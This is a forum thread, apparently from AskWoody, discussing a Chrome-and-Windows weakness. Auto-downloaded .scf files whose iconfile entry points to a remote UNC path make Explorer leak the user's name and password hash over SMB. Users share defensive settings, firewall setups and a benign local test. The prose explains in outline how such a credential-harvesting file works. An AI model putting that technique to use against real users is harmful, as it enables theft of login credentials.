Google Chrome Browser Vulnerability – check your “where to save file” settings

Topic

New Reply

Last week, a new topic was posted on a vulnerability on Google Chrome Browser over on Code Red – security advisories.   Bosko Stankovic, on defen
[See the full post at: Google Chrome Browser Vulnerability – check your “where to save file” settings]

1 user thanked author for this post.

GoneToPlaid

Reply | Quote

Replies

Hi everyone,

Kirsty, thank you for reporting this issue. For those who don’t know what SCF files are, they are Windows Explorer Command files. Obviously if any SCF file contains malicious commands, then that would be a bad thing for your computer if you ran the SCF file or if a web browser drive-by attack made the SCF file download and execute!

Everyone, no matter what web browser they use, should change their web browser’s Where To Save Files setting to Always Ask where to save the downloaded file. This is merely an example. What these settings are actually called may be somewhat different in your web browser.

Changing this setting in Chrome will prevent Chrome from downloading SCF files automatically since the user will instead get a popup window which will ask the user where to save the file with the SCF extension. For the user, this is your “heads up” that you do really really really do not want to download a potentially malicious SCF file!

Okay, there is nothing to be really paranoid about since many antivirus software programs have behavioral analysis engines which should detect malicious commands within a SCF file. Still, making the above change in whatever web browser you use is a really good idea so that you get a popup from your web browser before you actually download a file from the Internet.

Finally, all users should configure their Windows computers to NOT hide file extensions. Why? So that you can actually see the true file extension of whatever file you are about to download, or which is already on your computer.

If you persist in letting Windows hide file extensions, then for example what you might see when downloading a file is: File.TXT which appears to be a simple text file.

If you configure Windows to NOT hide file extensions, then for the the above example what you would actually see is the file’s true full name and file type: File.TXT.SCF which you now see is a Windows Explorer Command file.

Best regards,

–GTP

 

4 users thanked author for this post.

dhardyindr, Elly, Lori, Noel Carboni

Reply | Quote

Really good tip about not hiding file extensions, thanks @gonetoplaid.

In terms of the .scf downloading and antivirus:

Kirsty wrote:

“With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one,” Stankovic wrote. This step, he explained, is not optimal from a security standpoint, but for it to cause any harm a user would still need to manually open and run the (.scf) file.
…
When a number of anti-virus solutions were tested, none captured the downloaded file as suspicious.

Needless to say, Chrome deems .scf to be safe…

The articles linked in both topics on this issue are well worth checking out 🙂

Reply | Quote

Settings updated, thanks for the tip!

Reply | Quote

GoneToPlaid wrote:

… there is nothing to be really paranoid about since many antivirus software programs have behavioral analysis engines which should detect malicious commands within a SCF file.

I don’t know… from the DefenceCode article:

Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of  Iconfile parameter considering there are no legitimate uses of SCF with remote icon locations.

Wonder how this download situation works on my stupid android tablet?? Here you can’t really do anything…

1 user thanked author for this post.

Kirsty

Reply | Quote

I don’t understand why this is reported as a Chrome vulnerability. It seems primarily a Windows (Explorer) vulnerability.

A malicious file could end up on your PC in many ways, a Chrome download is just one of them. But just downloading/copying a file to your drive isn’t enough, it needs to be executed/processed by some software to do the damage.

So IMO it’s mostly up to Microsoft to fix this. Windows should not be automatically opening SCF files and retrieving their icons from remote SMB servers without user consent. And I’m pretty sure 99.99% of users could do entirely without this SCF functionality.

Reply | Quote

It is more of a general browser vulnerability. The default setting is to download ‘safe’ files automatically to a predefined location.

My question is how are SCF files executed? I am not very familiar with them. I am not sure I have ever seen one in the wild before.

Reply | Quote

I agree.  Without the user even trying to execute anything, a two-line text file with a .scf extension lists an IP address of unknown origin as its icon file, and Windows gleefully gives up its hashed password and userID to that IP address, trying to get a remotely linked icon for it, and it’s a Chrome vulnerability?  All Chrome is doing is faithfully saving the file the user asked it to download.  It’s Windows that turns that into a problem!

I don’t have a problem with .scf files still being in Windows.  There’s nothing wrong with the file format simply existing, even if it’s not used anymore by most people.  But why is Windows trying to parse a link for an icon file out across the WAN, exposing the login credentials’ hash in the process?

 

Dell XPS 13/9310, i5-1135G7/16GB, KDE Neon
XPG Xenia 15, i7-9750H/16GB & GTX1660ti, KDE Neon

Reply | Quote

And setting Chrome to “ask before download” does very little when it comes to users who are not tech savvy. It’s like telling them to not download malicious .exe files… yeah, good luck with that. Except it’s even worse, because malicious .exe files need to be opened manually, .scf files open by themselves!

Even if Chrome completely blocked .scf file downloads, you could still put those in a .zip along other (legit) files and so make sure that the user will navigate to that folder and trigger the .scf. It’s a mess and only Microsoft can fix it.

Reply | Quote

@ anonymous#117411

If a Windows Chrome user does not set it to “Ask before download”, a hacker may inject an infected SCF file as a drive-by download which will be automatically downloaded and saved onto the user’s Download folder without the user’s knowledge.
Sometime later, there will be a high risk of the user seeing that strange SCF file and opening it = gets infected. This can even happen to a non-dummy user.

Reply | Quote

Woody

What do you think about this?  I think this is something you should comment on.  Iand I’m sure many of your readers would like to hear what you think before I change my settings.

Thanks

Sam

 

 

1 user thanked author for this post.

Reply | Quote

SCF files are rare these days.

Of course, you should show filename extensions, as @GoneToPlaid says. That’s Step 1 or Step 2 after installing Windows, any version, on any computer – as listed in all of my books.

As far as “ask where to save each file” — I do that, primarily for convenience. I download so many files that the easiest way to keep them sorted out is to stick them in the right place to begin with.

And I agree with @Ascaris and @Noel Carboni that this is lousy Windows behavior. An outbound firewall is a good idea – although I don’t use one.

1 user thanked author for this post.

Elly

Reply | Quote

3+ million files here, and the only .scf files anywhere to be found are the ones delivered with XP x64 in a circa 2005 backup of an ancient system on a backup USB drive.

What is this functionality still doing in Windows Explorer?

Anyhow, just in case such a malicious .scf file ever shows up – or if any part of my OS or applications makes any unexpected attempt to “go online” without my permission – I maintain a deny-outgoing-by-default firewall setup. Such communications will be blocked.

A deny-by-default configuration is a bit difficult to initially set up to match your needs, but once in place it provides inexpensive insurance that communications you don’t want happening really aren’t happening.

You shouldn’t have to be afraid of what your computer might do online without you!

For what it’s worth, I have a Sphinx-based deny-by-default firewall setup on two hardware systems and three virtual machines, and the effort I have to put into maintaining them all has dropped to almost nothing – no more than a few minutes a week. It’s proven to be very manageable, and it doesn’t cut into my performance in any noticeable way. Because the firewall software is name-based, it handles all the IP address mutability of the modern internet. The only thing I have to do in an ongoing way is to keep up with changes I choose to make (i.e., if I install new or updated software that does new/different communications I have to choose whether to allow them when the Sphinx UI pops up a notice).

See also: https://www.askwoody.com/2016/sphinx-windows-firewall-control/

By comparison the Windows out-of-box firewall is A) set to allow-outgoing-by-default, B) virtually unmanageable if switched to deny-outgoing-by-default since it does not work with names but rather IP addresses, and C) has a poorly accessible log (the Windows Security Event log, whose interface is pretty clunky).

Just as a test on my Win 8.1 workstation, I set up a test .scf file using a UNC with a Microsoft server name in the iconfile= entry, and sure enough when I navigated into that folder in File Explorer the OS tried to contact the Microsoft server – and was blocked by the firewall (note the red arrows, indicating blocked comms):

-Noel

2 users thanked author for this post.

Elly, jelson

Reply | Quote

Noel Carboni wrote:

Just as a test on my Win 8.1 workstation, I set up a test .scf file using a UNC with a Microsoft server name in the iconfile= entry, and sure enough when I navigated into that folder in File Explorer the OS tried to contact the Microsoft server

Am I interpreting this  correctly? The file auto-executed simply by you navigating to the folder it was in in File Explorer.

That would mean then, if Google saved a file to your Downloads folder automatically (maybe unbeknownst to you, since .scf files are by default hidden), it could auto-execute if you clicked on the Downloads folder?

1 user thanked author for this post.

jelson

Reply | Quote

I think the point is that File Explorer tried to contact an SMB Server to obtain an icon for the SCF file, not that the command in the file was executed.

Reply | Quote

Exactly. And yes, just navigating into the folder containing the .scf file caused the system to initiate the networking activity.

Specifically, the “iconfile=” entry attempted to retrieve the icon from the UNC path name I had added. In doing so, it tried to make an SMB connection using Windows Networking. A malicious server at the other end would be making note of the specifics of every such request, leading to your username and hashed password being captured by a system that has no business ever seeing that info.

-Noel

2 users thanked author for this post.

Elly, GoneToPlaid

Reply | Quote

Thanks @noel-carboni, that confirms the information in last week’s topic.

Kirsty wrote:

Just by accessing a folder containing a malicious SCF file, a user will unwittingly share his computer’s login credentials with an attacker via Google Chrome and the SMB protocol.

This technique is not new, but a combination of two different techniques, one taken from the Stuxnet operation, and one detailed by a security researcher at the Black Hat security conference.

2 users thanked author for this post.

Elly, Noel Carboni

Reply | Quote

Interesting stuff there. I’ve been considering doing a “Deny outgoing by default” setting and just allowing what I need (which I’m pretty sure I could figure out), but isn’t it true that if certain things are blocked, Windows will start to have problems? How do you tell which connections need to be made to MS servers (essential) and which do not?

As for the browser setting, I’ve had that set to ask me for the location to download to for many, many years. Much easier to find stuff that way. I don’t even use the “Downloads” folder.

1 user thanked author for this post.

Alice

Reply | Quote

There’s some trial and error in getting a good deny-outgoing-by-default setup. The Sphinx firewall comes with a decent default setup, but I chose to throw it all out and build mine up from scratch. The Sphinx software gives good feedback, so the long and short of it is: You can figure out how to allow just what’s needed with a little bit of effort.

If you’re interested in using the Sphinx software, PM me. I’ll be happy to make copies of the configs I use available.

-Noel

Reply | Quote

Noel-

I am on Windows 7 and would like to use the Sphinx firewall to set up a deny-by-default configuration, but I have no idea what system connections can be denied without causing problems.

Do you have such a list or do you know of any method other trial-and-error for me to find out by myself?

Thanks for any information you can provide

-Alice

Reply | Quote

Hi Alice, the short answer is: It’s complicated to figure out, but doable.

The Sphinx software does come with a workable default configuration, though I chose to do it all over.

I’m willing to share a copy of the configurations I’ve developed for Win 7, 8.1, and 10. Within them there’s my list of certification authority servers that should always be allowed, and my take on how to use the zones and rules and examples of how the applications / system accessories can be set up. They might not be exactly what you need but could serve as a way to see how someone who’s familiar with the product has set it up.

I’d rather not post a public link to my configs, though. If you’d like a copy please send me a private message via this forum or feel free to eMail me at: NCarboni@ProDigitalSoftware.com

-Noel

1 user thanked author for this post.

Alice

Reply | Quote

Is blocking outgoing connections to explorer.exe good enough or do I have to do something else?

Reply | Quote

That’s a bit of an oversimplification, though not too bad in the case of Explorer. In my experience Explorer only very rarely normally tries to contact anything via networking. But it’s not zero.

If you’ve added any Shell Extensions or extensions to Explorer, they might want to contact sites. For example, Classic Shell will occasionally try to check for updates to itself online. You don’t need to allow it; you can take on the entire responsibility to check for updates yourself. I’m just sharing my experience. Classic Shell will continue to run fine if you don’t allow it to contact its mothership.

There is a possibility that one or more system components – including Explorer though usually not – will want to contact one of the upwards of 100 certification authority sites online. That kind of traffic, to those specific sites, should virtually always be allowed. That being said, it does represent a vector whereby others elsewhere can know your system is online, so you may have privacy concerns.

And don’t forget that if you DO have a LAN, you might want to choose to allow Explorer to contact your other systems on the LAN, even if you’re blocking comms to the outside world. Again, it’s not really necessary per se – it all comes down to whether you trust the systems inside your LAN.

-Noel

Reply | Quote

I was asking specifically for the SCFvulnerability. Anyway, I tried and blocking explorer.exe does nothing to stop it. The connection is made by “System”, not an isolated process that can be blocked without breaking [who] knows what Windows functionality.

MS should just give us the option to disable SCF files from being processed. Or better yet make this SCF feature opt-in, it would save us all a lot of potential trouble.

Reply | Quote

It is called Software Restriction Policy under Group Policies if you have them available.

Reply | Quote

ch100 wrote:

It is called Software Restriction Policy under Group Policies if you have them available.

Could you please go into a little more detail how that could be used to restrict .scf files from being actively executed? I see that SCF can be added to the list of files considered “executable”, but I’m not sure what that does to mitigate this vulnerability.

Thanks.

-Noel

Reply | Quote

I use SRP actually, but adding the SCF file extension to the list doesn’t help. The file is still being executed/processed when I open the folder.

Edit html to text (possibly caused by copy>paste)

Reply | Quote

I was asking specifically for the SCFvulnerability. Anyway, I tried and blocking explorer.exe does nothing to stop it. The connection is made by “System”, not an isolated process that can be blocked without breaking [who] knows what Windows functionality.

Yeah, sorry, I thought that you’d be able to gather that the System is what made the contact in my screen grab above, so I answered a bit more broadly.

For what it’s worth I normally keep my System, svchost, etc. components on a fairly short leash – they can contact other systems on my LAN freely but they cannot reach the Internet except for some very specific exceptions (i.e., certification authority servers, time servers) normally. I have to reconfigure the firewall to complete a Windows Update.

-Noel

1 user thanked author for this post.

Elly

Reply | Quote

A blogpost by Eric Pettit, on medium.com (May 24, 2017), discusses Firefox and Chrome. It is quite interesting reading.

Browse Against the Machine:
Some folks might interpret “browse against the machine” as a desperate cry, but it isn’t. Firefox grew in users last year and Mozilla is financially healthier now than it has ever been. Yeah, we’re trying to be provocative to get our word out, with budgets a tiny fraction of our competitors. But we’re frankly more confident in the product than we have ever been in short time I’ve been here, and its starting to show in how we talk to the outside world.
…
Firefox gives you the most control over your data and privacy. See private browsing with tracking protection — which Chrome doesn’t have, or our new Focus browser on mobile.

4 users thanked author for this post.

GoneToPlaid, Elly, satrow, Noel Carboni

Reply | Quote

I stopped reading when I got to…

Safari and Internet Explorer are just plain bad…

Sorry, but it just makes me think everyone wants to act like a browser expert because it’s “cool” to do so. This person even works in browser marketing… As if the world needs such a thing.

People like to rant about IE but it works fine and has arguably one of the best security models. It’s just not set to be very secure out of the box. Of course now Microsoft is leaving IE behind because of their silly push for Apps, but it’s not dead yet.

I haven’t tried to reconfigure FireFox yet, but last time I opened it on its own it contacted about a dozen different web sites having NOTHING to do with my home page – presumably to support its bloated feature set.

Mr. Petit is right about one thing… Google is not to be trusted.

-Noel

1 user thanked author for this post.

satrow

Reply | Quote

A response to “Browse Against the Machine” on Computerworld.com, titled “Mozilla execs clash over whether Firefox has a future”.

See Woody’s blogpost: https://www.askwoody.com/forums/topic/mozilla-execs-clash-over-whether-firefox-has-a-future/

1 user thanked author for this post.

Elly

Reply | Quote

Yep, with Firefox it is as simple as turning off telemetry so that nothing is sent to anyone. And if you then go into about:config and make three simple changes, you can turn off Firefox’s telemetry gathering altogether. And then you can easily delete all previously gathered telemetry under your Firefox user profile. Mozilla doesn’t hide where the telemetry is stored.

The above is one reason why I only use Firefox. My other reason for using Firefox is more important to me. Specifically, I do a lot of online research. I use several plugins for Firefox which makes it much easier for me to perform my online research and to gather research data. For whatever you need to do online, more than likely there is a free Firefox plugin because some developer or programmer had the same need and took the time to write a plugin to accomplish that need. This, at least for me, is what mostly makes Firefox stand out as my web browser of choice.

Reply | Quote